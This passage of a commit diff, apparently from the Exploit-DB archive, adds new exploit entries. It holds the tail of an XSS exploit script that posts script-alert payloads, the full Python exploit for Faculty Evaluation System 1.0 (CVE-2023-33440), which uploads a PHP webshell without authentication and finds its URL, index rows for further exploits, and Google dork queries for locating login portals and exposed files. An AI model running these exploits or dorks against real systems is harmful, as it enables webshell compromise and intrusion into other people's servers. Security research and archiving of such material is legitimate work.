"mobilenumber": "8979555558",
"email": "admin@gmail.com",
"submit": "",
}
# SENDING THE RESPONSE WITH POST REQUEST
response = requests.post(Website_url, headers=headers, data=payload)
print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)
# CHECKING THE STATUS CODE 200 AND ALSO FINDING THE SCRIPT TAG WITH THE HELP OF REGEX
if response.status_code == 200:
scripts = re.findall(r'<script>alert\(.*?\)</script>', response.text)
print(Fore.GREEN + "> Response After Executing the Payload at adminname parameter : "+ Fore.RESET)
print(Fore.GREEN+">"+Fore.RESET,scripts)
exploit.py
Displaying exploit.py.

115
exploits/php/webapps/51495.py Executable file
View file

@ -0,0 +1,115 @@
# Exploit Title: Faculty Evaluation System 1.0 - Unauthenticated File Upload
# Date: 5/29/2023
# Author: Alex Gan
# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip
# Version: 1.0
# Tested on: LAMP Fedora server 38 (Thirty Eight) Apache/2.4.57 10.5.19-MariaDB PHP 8.2.6
# CVE: CVE-2023-33440
# References: https://nvd.nist.gov/vuln/detail/CVE-2023-33440
# https://www.exploit-db.com/exploits/49320
# https://github.com/F14me7wq/bug_report/tree/main/vendors/oretnom23/faculty-evaluation-system
#
#!/usr/bin/env python3
import os
import sys
import requests
import argparse
from bs4 import BeautifulSoup
from urllib.parse import urlparse
from requests.exceptions import ConnectionError, Timeout
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', type=str, help='URL')
parser.add_argument('-p', '--payload', type=str, help='PHP webshell')
return parser.parse_args()
def get_user_input(args):
if not (args.url):
args.url = input('Use the -u argument or Enter URL:')
if not (args.payload):
args.payload = input('Use the -p argument or Enter file path PHP webshell: ')
return args.url, args.payload
def check_input_url(url):
parsed_url = urlparse(url)
if not parsed_url.scheme:
url = 'http://' + url
if parsed_url.path.endswith('/'):
url = url.rstrip('/')
return url
def check_host_availability(url):
try:
response = requests.head(url=url + '/login.php')
if response.status_code == 200:
print("[+] Host is accessible")
else:
print("[-] Host is not accessible")
print(" Status code:", response.status_code)
sys.exit()
except (ConnectionError, Timeout) as e:
print("[-] Host is not accessible")
sys.exit()
except requests.exceptions.RequestException as e:
print("[-] Error:", e)
sys.exit()
def make_request(url, method, files=None):
if method == 'GET':
response = requests.get(url)
elif method == 'POST':
response = requests.post(url, files=files)
else:
raise ValueError(f'Invalid HTTP method: {method}')
if response.status_code == 200:
print('[+] Request successful')
return response.text
else:
print(f'[-] Error {response.status_code}: {response.text}')
return None
def find_file(response_get, filename, find_url):
soup = BeautifulSoup(response_get, 'html.parser')
links = soup.find_all('a')
found_files = []
for link in links:
file_upl = link.get('href')
if file_upl.endswith(filename):
found_files.append(file_upl)
if found_files:
print(' File found:')
for file in found_files:
print('[*] ' + file)
print(' Full URL of your file:')
for file_url in found_files:
print('[*] ' + find_url + file_url)
else:
print('[-] File not found')
def main():
args = get_args()
url, payload = get_user_input(args)
url = check_input_url(url)
check_host_availability(url)
post_url = url + "/ajax.php?action=save_user"
get_url = url + "/assets/uploads/"
filename = os.path.basename(payload)
payload_file = [('img',(filename,open(args.payload,'rb'),'application/octet-stream'))]
print(" Loading payload file")
make_request(post_url, 'POST', files=payload_file)
print(" Listing the uploads directory")
response_get = make_request(get_url, 'GET')
print(" Finding the downloaded payload file")
find_file(response_get, filename, get_url)
if __name__ == "__main__":
main()

15
files_exploits.csv
View file

@ -2900,6 +2900,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
51257,exploits/go/webapps/51257.py,"Answerdev 1.0.3 - Account Takeover",2023-04-05,"Eduardo Pérez-Malumbres Cervera",webapps,go,,2023-04-05,2023-04-27,1,CVE-2023-0744,,,,,
51497,exploits/go/webapps/51497.txt,"Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32751,,,,,
51498,exploits/go/webapps/51498.txt,"Pydio Cells 4.1.2 - Server-Side Request Forgery",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32750,,,,,
51496,exploits/go/webapps/51496.txt,"Pydio Cells 4.1.2 - Unauthorised Role Assignments",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32749,,,,,
7060,exploits/hardware/dos/7060.txt,"2WIRE DSL Router - 'xslt' Denial of Service",2008-11-08,hkm,dos,hardware,,2008-11-07,,1,OSVDB-60243;CVE-2008-6605;OSVDB-49835,,,,,
2246,exploits/hardware/dos/2246.cpp,"2WIRE Modems/Routers - 'CRLF' Denial of Service",2006-08-22,preth00nker,dos,hardware,,2006-08-21,,1,OSVDB-28171;CVE-2009-3962;CVE-2006-4523,,,,,
10182,exploits/hardware/dos/10182.py,"2WIRE Router 5.29.52 - Remote Denial of Service",2009-10-29,hkm,dos,hardware,,2009-10-28,,1,,,,,,http://secunia.com/advisories/21583
@ -10761,6 +10764,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
31050,exploits/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",remote,multiple,,2008-01-28,2014-01-20,1,CVE-2008-0387;OSVDB-43187,,,,,https://www.securityfocus.com/bid/27403/info
29820,exploits/multiple/remote/29820.html,"Firebug 1.03 - Rep.JS Script Code Injection",2007-03-06,"Thor Larholm",remote,multiple,,2007-03-06,2013-11-26,1,CVE-2007-1947;OSVDB-34122,,,,,https://www.securityfocus.com/bid/23349/info
37851,exploits/multiple/remote/37851.txt,"Flash Boundless Tunes - Universal SOP Bypass Through ActionSctipt's Sound Object",2015-08-19,"Google Security Research",remote,multiple,,2015-08-19,2015-08-19,1,CVE-2015-5116,,,,,https://code.google.com/p/google-security-research/issues/detail?id=354&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
51493,exploits/multiple/remote/51493.rb,"Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)",2023-05-31,"Ege Balci",remote,multiple,,2023-05-31,2023-05-31,0,CVE-2018-8065,,,,,
34500,exploits/multiple/remote/34500.html,"Flock Browser 3.0.0 - Malformed Bookmark HTML Injection",2010-08-19,Lostmon,remote,multiple,,2010-08-19,2014-09-01,1,CVE-2010-3202;OSVDB-67969,,,,,https://www.securityfocus.com/bid/42556/info
19223,exploits/multiple/remote/19223.txt,"FloosieTek FTGate 2.1 - Web File Access",1999-05-25,Marc,remote,multiple,,1999-05-25,2012-06-16,1,CVE-1999-0887;OSVDB-1137,,,,,https://www.securityfocus.com/bid/280/info
28209,exploits/multiple/remote/28209.txt,"FLV Players 8 - 'player.php?url' Cross-Site Scripting",2006-07-12,xzerox,remote,multiple,,2006-07-12,2013-09-11,1,CVE-2006-3624;OSVDB-28643,,,,,https://www.securityfocus.com/bid/18954/info
@ -11940,6 +11944,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49830,exploits/multiple/webapps/49830.js,"Moeditor 0.2.0 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
49184,exploits/multiple/webapps/49184.txt,"mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting",2020-12-03,"Sagar Banwa",webapps,multiple,,2020-12-03,2020-12-03,0,,,,,,
49582,exploits/multiple/webapps/49582.txt,"Monica 2.19.1 - 'last_name' Stored XSS",2021-02-23,BouSalman,webapps,multiple,,2021-02-23,2021-02-23,0,CVE-2021-27370,,,,,
51499,exploits/multiple/webapps/51499.txt,"MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)",2023-05-31,tmrswrr,webapps,multiple,,2023-05-31,2023-05-31,0,,,,,,
50518,exploits/multiple/webapps/50518.txt,"Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)",2021-11-12,"Shain Lakin",webapps,multiple,,2021-11-12,2021-11-12,0,,,,,,
9898,exploits/multiple/webapps/9898.txt,"Mura CMS 5.1 - Root Path Disclosure",2009-10-29,"Vladimir Vorontsov",webapps,multiple,,2009-10-28,,1,OSVDB-59579,,,,,
50428,exploits/multiple/webapps/50428.txt,"myfactory FMS 7.1-911 - 'Multiple' Reflected Cross-Site Scripting (XSS)",2021-10-19,"RedTeam Pentesting GmbH",webapps,multiple,,2021-10-19,2021-10-19,0,CVE-2021-42566;CVE-2021-42565,,,,,
@ -18154,6 +18159,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45813,exploits/php/webapps/45813.txt,"Facturation System 1.0 - 'modid' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comsimple-invoice-master.zip,
12521,exploits/php/webapps/12521.txt,"Factux - Local File Inclusion",2010-05-06,ALTBTA,webapps,php,,2010-05-05,,0,OSVDB-64382;OSVDB-64381;OSVDB-64380;OSVDB-64379;OSVDB-64378;OSVDB-64377;OSVDB-64376;OSVDB-64375,,,,,
49320,exploits/php/webapps/49320.txt,"Faculty Evaluation System 1.0 - Stored XSS",2020-12-22,"Vijay Sachdeva",webapps,php,,2020-12-22,2020-12-22,0,,,,,,
51495,exploits/php/webapps/51495.py,"Faculty Evaluation System 1.0 - Unauthenticated File Upload",2023-05-31,URGAN,webapps,php,,2023-05-31,2023-05-31,0,CVE-2023-33440,,,,,
10230,exploits/php/webapps/10230.txt,"Fake Hit Generator 2.2 - Arbitrary File Upload",2009-11-25,DigitALL,webapps,php,,2009-11-24,,1,,,,,,
43072,exploits/php/webapps/43072.txt,"Fake Magazine Cover Script - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,,2017-10-30,2017-10-30,0,CVE-2017-15987,,,,,
4712,exploits/php/webapps/4712.txt,"falcon CMS 1.4.3 - Remote File Inclusion / Cross-Site Scripting",2007-12-10,MhZ91,webapps,php,,2007-12-09,2016-10-20,1,OSVDB-40988;CVE-2007-6490;OSVDB-40987;OSVDB-40986;CVE-2007-6489;OSVDB-40985;CVE-2007-6488,,,,http://www.exploit-db.comfalcon143.tar.gz,
@ -24727,6 +24733,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48419,exploits/php/webapps/48419.txt,"Online Scheduling System 1.0 - 'username' SQL Injection",2020-05-05,"Saurav Shukla",webapps,php,,2020-05-05,2020-05-05,0,,,,,,
48409,exploits/php/webapps/48409.txt,"Online Scheduling System 1.0 - Authentication Bypass",2020-05-01,boku,webapps,php,,2020-05-01,2020-05-01,0,,,,,,
48403,exploits/php/webapps/48403.txt,"Online Scheduling System 1.0 - Persistent Cross-Site Scripting",2020-05-01,boku,webapps,php,,2020-05-01,2020-05-01,0,,,,,,
51494,exploits/php/webapps/51494.py,"Online Security Guards Hiring System 1.0 - Reflected XSS",2023-05-31,"AFFAN AHMED",webapps,php,,2023-05-31,2023-05-31,0,CVE-2023-0527,,,,,
48819,exploits/php/webapps/48819.txt,"Online Shop Project 1.0 - 'p' SQL Injection",2020-09-21,Augkim,webapps,php,,2020-09-21,2020-09-21,0,,,,,,
48771,exploits/php/webapps/48771.txt,"Online Shopping Alphaware 1.0 - 'id' SQL Injection",2020-08-28,"Moaaz Taha",webapps,php,,2020-08-28,2020-08-28,0,,,,,,
48725,exploits/php/webapps/48725.txt,"Online Shopping Alphaware 1.0 - Authentication Bypass",2020-07-30,"Ahmed Abbas",webapps,php,,2020-07-30,2020-07-30,0,,,,,,
@ -24736,7 +24743,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48631,exploits/php/webapps/48631.txt,"Online Shopping Portal 3.1 - Authentication Bypass",2020-07-01,"Ümit Yalçın",webapps,php,,2020-07-01,2020-07-01,0,,,,,,
50029,exploits/php/webapps/50029.py,"Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)",2021-06-17,Tagoletta,webapps,php,,2021-06-17,2021-06-17,0,,,,,,
48383,exploits/php/webapps/48383.txt,"Online shopping system advanced 1.0 - 'p' SQL Injection",2020-04-27,"Majid kalantari",webapps,php,,2020-04-27,2020-04-27,0,,,,,,
51103,exploits/php/webapps/51103.txt,"Online shopping system advanced 1.0 - Multiple Vulnerabilities",2023-03-28,"Rafael Pedrero",webapps,php,,2023-03-28,2023-03-28,0,,,,,,
51103,exploits/php/webapps/51103.txt,"Online shopping system advanced 1.0 - Multiple Vulnerabilities",2023-03-28,"Rafael Pedrero",webapps,php,,2023-03-28,2023-05-31,1,,,,,,
35480,exploits/php/webapps/35480.txt,"Online store PHP script - Multiple Cross-Site Scripting / SQL Injections",2011-03-21,"kurdish hackers team",webapps,php,,2011-03-21,2014-12-07,1,,,,,,https://www.securityfocus.com/bid/46960/info
44719,exploits/php/webapps/44719.txt,"Online Store System CMS 1.0 - SQL Injection",2018-05-23,AkkuS,webapps,php,,2018-05-23,2018-05-23,0,,,,,,
48616,exploits/php/webapps/48616.txt,"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)",2020-06-23,BKpatron,webapps,php,,2020-06-23,2020-06-23,0,,,,,,
@ -28747,6 +28754,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49238,exploits/php/webapps/49238.sh,"Rukovoditel 2.6.1 - RCE (1)",2020-12-11,coiffeur,webapps,php,,2020-12-11,2021-02-18,0,CVE-2020-11819,,,,,
48784,exploits/php/webapps/48784.py,"Rukovoditel 2.7.1 - Remote Code Execution (2) (Authenticated)",2020-09-02,danyx07,webapps,php,,2020-09-02,2021-02-18,0,CVE-2020-11819,,,,,
51121,exploits/php/webapps/51121.txt,"rukovoditel 3.2.1 - Cross-Site Scripting (XSS)",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
51490,exploits/php/webapps/51490.txt,"Rukovoditel 3.3.1 - CSV injection",2023-05-31,"Mirabbas Ağalarov",webapps,php,,2023-05-31,2023-05-31,0,,,,,,
51322,exploits/php/webapps/51322.txt,"Rukovoditel 3.3.1 - Remote Code Execution (RCE)",2023-04-07,"Mirabbas Ağalarov",webapps,php,,2023-04-07,2023-04-07,0,,,,,,
46608,exploits/php/webapps/46608.txt,"Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting",2019-03-26,"Javier Olmedo",webapps,php,80,2019-03-26,2019-03-26,0,CVE-2019-7400,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comrukovoditel_2.4.zip,https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/
45620,exploits/php/webapps/45620.txt,"Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80,2018-10-16,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comrukovoditel_2.3.zip,
@ -29034,6 +29042,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
7111,exploits/php/webapps/7111.txt,"ScriptsFeed (SF) Auto Classifieds Software - Arbitrary File Upload",2008-11-13,ZoRLu,webapps,php,,2008-11-12,,1,OSVDB-49960;CVE-2008-6944;CVE-2008-6943;CVE-2008-6942,,,,,
7110,exploits/php/webapps/7110.txt,"ScriptsFeed (SF) Real Estate Classifieds Software - Arbitrary File Upload",2008-11-13,ZoRLu,webapps,php,,2008-11-12,,1,OSVDB-49960;CVE-2008-6944;CVE-2008-6943;CVE-2008-6942,,,,,
7112,exploits/php/webapps/7112.txt,"ScriptsFeed (SF) Recipes Listing Portal - Arbitrary File Upload",2008-11-13,ZoRLu,webapps,php,,2008-11-12,,1,OSVDB-49960;CVE-2008-6944;CVE-2008-6943;CVE-2008-6942,,,,,
51491,exploits/php/webapps/51491.txt,"SCRMS 2023-05-27 1.0 - Multiple SQL Injection",2023-05-31,nu11secur1ty,webapps,php,,2023-05-31,2023-05-31,0,,,,,,
37548,exploits/php/webapps/37548.txt,"Scrutinizer 9.0.1.19899 - Arbitrary File Upload",2012-07-30,"Mario Ceballos",webapps,php,,2012-07-30,2015-07-10,1,CVE-2012-2627;OSVDB-84319,,,,,https://www.securityfocus.com/bid/54726/info
37547,exploits/php/webapps/37547.txt,"Scrutinizer 9.0.1.19899 - Multiple Cross-Site Scripting Vulnerabilities",2012-07-30,"Mario Ceballos",webapps,php,,2012-07-30,2015-07-10,1,CVE-2012-3848;OSVDB-84321,,,,,https://www.securityfocus.com/bid/54725/info
27724,exploits/php/webapps/27724.txt,"Scry Gallery - Directory Traversal",2006-04-21,"Morocco Security Team",webapps,php,,2006-04-21,2013-08-20,1,CVE-2006-1995;OSVDB-24889,,,,,https://www.securityfocus.com/bid/17649/info
@ -29125,7 +29134,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35197,exploits/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",webapps,php,,2014-11-12,2014-11-12,0,OSVDB-114661;OSVDB-114660,,,,,
45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comServerZilla_src.zip,
10938,exploits/php/webapps/10938.txt,"Service d'upload 1.0.0 - Arbitrary File Upload",2010-01-03,indoushka,webapps,php,,2010-01-02,,0,,,,,,
51482,exploits/php/webapps/51482.txt,"Service Provider Management System v1.0 - SQL Injection",2023-05-24,"ASHIK KUNJUMON",webapps,php,,2023-05-24,2023-05-24,0,,,,,,
51482,exploits/php/webapps/51482.txt,"Service Provider Management System v1.0 - SQL Injection",2023-05-24,"ASHIK KUNJUMON",webapps,php,,2023-05-24,2023-05-31,1,CVE-2023-2769,,,,,
4089,exploits/php/webapps/4089.pl,"SerWeb 0.9.4 - 'load_lang.php' Remote File Inclusion",2007-06-21,Kw3[R]Ln,webapps,php,,2007-06-20,2016-10-05,1,OSVDB-36324;CVE-2007-3358,,,,http://www.exploit-db.comserweb-0.9.4.tar.gz,
4696,exploits/php/webapps/4696.txt,"SerWeb 2.0.0 dev1 2007-02-20 - Multiple Local/Remote File Inclusion Vulnerabilities",2007-12-06,GoLd_M,webapps,php,,2007-12-05,,1,OSVDB-39220;CVE-2007-6290;OSVDB-39219;CVE-2007-6289;OSVDB-39218;OSVDB-39217,,,,,
9284,exploits/php/webapps/9284.txt,"SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusions",2009-07-27,GoLd_M,webapps,php,,2009-07-26,,1,,,,,,
@ -31084,6 +31093,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
39413,exploits/php/webapps/39413.txt,"UliCMS v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",webapps,php,80,2016-02-04,2016-02-04,1,,,,,http://www.exploit-db.comulicms-9.8.1-snowfall-full.zip,
51434,exploits/php/webapps/51434.txt,"Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
51435,exploits/php/webapps/51435.txt,"Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-09,1,,,,,,
51433,exploits/php/webapps/51433.py,"Ulicms-2023.1-sniffing-vicuna - Privilege escalation",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-31,0,,,,,,
11048,exploits/php/webapps/11048.txt,"Ulisse's Scripts 2.6.1 - 'ladder.php' SQL Injection",2010-01-07,Sora,webapps,php,,2010-01-06,,1,,,,,,
11385,exploits/php/webapps/11385.txt,"ULoki Community Forum 2.1 - 'usercp.php' Cross-Site Scripting",2010-02-10,"Sioma Labs",webapps,php,,2010-02-09,,1,,,,,,
34888,exploits/php/webapps/34888.txt,"UloKI PHP Forum 2.1 - 'search.php' Cross-Site Scripting",2009-08-19,Moudi,webapps,php,,2009-08-19,2016-10-10,1,CVE-2009-3202;OSVDB-57176,,,,,https://www.securityfocus.com/bid/44273/info
@ -31142,6 +31152,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50022,exploits/php/webapps/50022.txt,"Unified Office Total Connect Now 1.0 - 'data' SQL Injection",2021-06-17,"Ajaikumar Nadar",webapps,php,,2021-06-17,2021-06-17,0,,,,,,
3106,exploits/php/webapps/3106.txt,"uniForum 4 - 'wbsearch.aspx' SQL Injection",2007-01-09,ajann,webapps,php,,2007-01-08,,1,OSVDB-32927;CVE-2007-0226,,,,,
37216,exploits/php/webapps/37216.txt,"Unijimpe Captcha - 'captchademo.php' Cross-Site Scripting",2012-05-16,"Daniel Godoy",webapps,php,,2012-05-16,2015-06-06,1,CVE-2012-2914;OSVDB-82267,,,,,https://www.securityfocus.com/bid/53585/info
51492,exploits/php/webapps/51492.txt,"unilogies/bumsys v1.0.3 beta - Unrestricted File Upload",2023-05-31,"AFFAN AHMED",webapps,php,,2023-05-31,2023-05-31,0,CVE-2023-0455,,,,,
29504,exploits/php/webapps/29504.txt,"Unique Ads - 'Banner.php' SQL Injection",2007-01-22,Linux_Drox,webapps,php,,2007-01-22,2013-11-08,1,,,,,,https://www.securityfocus.com/bid/22164/info
48166,exploits/php/webapps/48166.txt,"UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read",2020-03-04,NgoAnhDuc,webapps,php,,2020-03-04,2020-03-04,0,,,,,,
46389,exploits/php/webapps/46389.py,"UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload",2019-02-15,"Mohammad Danish",webapps,php,80,2019-02-15,2019-02-15,0,,,,,http://www.exploit-db.comlaravel-filemanager-2.0.0-alpha7.tar.gz,

Can't render this file because it is too large.

122
ghdb.xml
View file

@ -33661,6 +33661,21 @@ Aamir Rehman
<date>2018-02-14</date>
<author>Aamir Rehman</author>
</entry>
<entry>
<id>8200</id>
<link>https://www.exploit-db.com/ghdb/8200</link>
<category>Files Containing Juicy Info</category>
<shortDescription>allintitle:&quot;macOS Server&quot; site:.edu</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;macOS Server&quot; site:.edu
# Files Containing Juicy Info
# Date:31/05/2023
# Exploit Author: Thomas Heverin</textualDescription>
<query>allintitle:&quot;macOS Server&quot; site:.edu</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;macOS Server&quot; site:.edu</querystring>
<edb></edb>
<date>2023-05-31</date>
<author>Thomas Heverin</author>
</entry>
<entry>
<id>8097</id>
<link>https://www.exploit-db.com/ghdb/8097</link>
@ -44667,6 +44682,22 @@ Author: Abhi Chitkara
<date>2022-06-17</date>
<author>Danish Eqbal</author>
</entry>
<entry>
<id>8198</id>
<link>https://www.exploit-db.com/ghdb/8198</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;private.properties&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;private.properties&quot;
# Files Containing Juicy Info
# Date:31/05/2023
# Exploit Author: Praharsh Kumar Singh
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;private.properties&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;private.properties&quot;</querystring>
<edb></edb>
<date>2023-05-31</date>
<author>Praharsh Kumar Singh</author>
</entry>
<entry>
<id>7957</id>
<link>https://www.exploit-db.com/ghdb/7957</link>
@ -44713,6 +44744,22 @@ Author: Abhi Chitkara
<date>2021-09-24</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>8197</id>
<link>https://www.exploit-db.com/ghdb/8197</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;profiler&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;profiler&quot;
# Files Containing Juicy Info
# Date:31/05/2023
# Exploit Author: Praharsh Kumar Singh
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;profiler&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;profiler&quot;</querystring>
<edb></edb>
<date>2023-05-31</date>
<author>Praharsh Kumar Singh</author>
</entry>
<entry>
<id>7710</id>
<link>https://www.exploit-db.com/ghdb/7710</link>
@ -47800,6 +47847,21 @@ Sachin
<date>2020-07-07</date>
<author>Sachin Kattimani</author>
</entry>
<entry>
<id>8204</id>
<link>https://www.exploit-db.com/ghdb/8204</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;SCM Manager&quot; intext:1.60</shortDescription>
<textualDescription># Google Dork: intitle:&quot;SCM Manager&quot; intext:1.60
# Files Containing Juicy Info
# Date:31/05/2023
# Exploit Author: Alexandros Pappas</textualDescription>
<query>intitle:&quot;SCM Manager&quot; intext:1.60</query>
<querystring>https://www.google.com/search?q=intitle:&quot;SCM Manager&quot; intext:1.60</querystring>
<edb></edb>
<date>2023-05-31</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>8190</id>
<link>https://www.exploit-db.com/ghdb/8190</link>
@ -53626,6 +53688,21 @@ passwords..etc</textualDescription>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>8203</id>
<link>https://www.exploit-db.com/ghdb/8203</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:wp-content/uploads/sites</shortDescription>
<textualDescription># Google Dork: inurl:wp-content/uploads/sites
# Files Containing Juicy Info
# Date:31/05/2023
# Exploit Author: Stuart Steenberg</textualDescription>
<query>inurl:wp-content/uploads/sites</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/uploads/sites</querystring>
<edb></edb>
<date>2023-05-31</date>
<author>Stuart Steenberg</author>
</entry>
<entry>
<id>8187</id>
<link>https://www.exploit-db.com/ghdb/8187</link>
@ -88122,6 +88199,36 @@ default: admin // adminadmin</textualDescription>
<date>2021-11-12</date>
<author>Naveen Venugopal</author>
</entry>
<entry>
<id>8202</id>
<link>https://www.exploit-db.com/ghdb/8202</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Re: inurl:&quot;/admin&quot; intitle:&quot;adminlogin&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/admin&quot; intitle:&quot;adminlogin&quot;
# Pages Containing Login Portals
# Date:31/05/2023
# Exploit Author: Ishak Hasan Sabbir</textualDescription>
<query>Re: inurl:&quot;/admin&quot; intitle:&quot;adminlogin&quot;</query>
<querystring>https://www.google.com/search?q=Re: inurl:&quot;/admin&quot; intitle:&quot;adminlogin&quot;</querystring>
<edb></edb>
<date>2023-05-31</date>
<author>Ishak Hasan Sabbir</author>
</entry>
<entry>
<id>8201</id>
<link>https://www.exploit-db.com/ghdb/8201</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Re: inurl:&quot;/user&quot; intitle:&quot;userlogin&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/user&quot; intitle:&quot;userlogin&quot;
# Pages Containing Login Portals
# Date:31/05/2023
# Exploit Author: Ishak Hasan Sabbir</textualDescription>
<query>Re: inurl:&quot;/user&quot; intitle:&quot;userlogin&quot;</query>
<querystring>https://www.google.com/search?q=Re: inurl:&quot;/user&quot; intitle:&quot;userlogin&quot;</querystring>
<edb></edb>
<date>2023-05-31</date>
<author>Ishak Hasan Sabbir</author>
</entry>
<entry>
<id>5619</id>
<link>https://www.exploit-db.com/ghdb/5619</link>
@ -100793,6 +100900,21 @@ Discovered By: Kevin Randall
<date>2019-04-03</date>
<author>Kevin Randall</author>
</entry>
<entry>
<id>8199</id>
<link>https://www.exploit-db.com/ghdb/8199</link>
<category>Various Online Devices</category>
<shortDescription>allintitle:&quot;A8810-0&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;A8810-0&quot;
# Various Online Devices
# Date:31/05/2023
# Exploit Author: Thomas Heverin</textualDescription>
<query>allintitle:&quot;A8810-0&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;A8810-0&quot;</querystring>
<edb></edb>
<date>2023-05-31</date>
<author>Thomas Heverin</author>
</entry>
<entry>
<id>1397</id>
<link>https://www.exploit-db.com/ghdb/1397</link>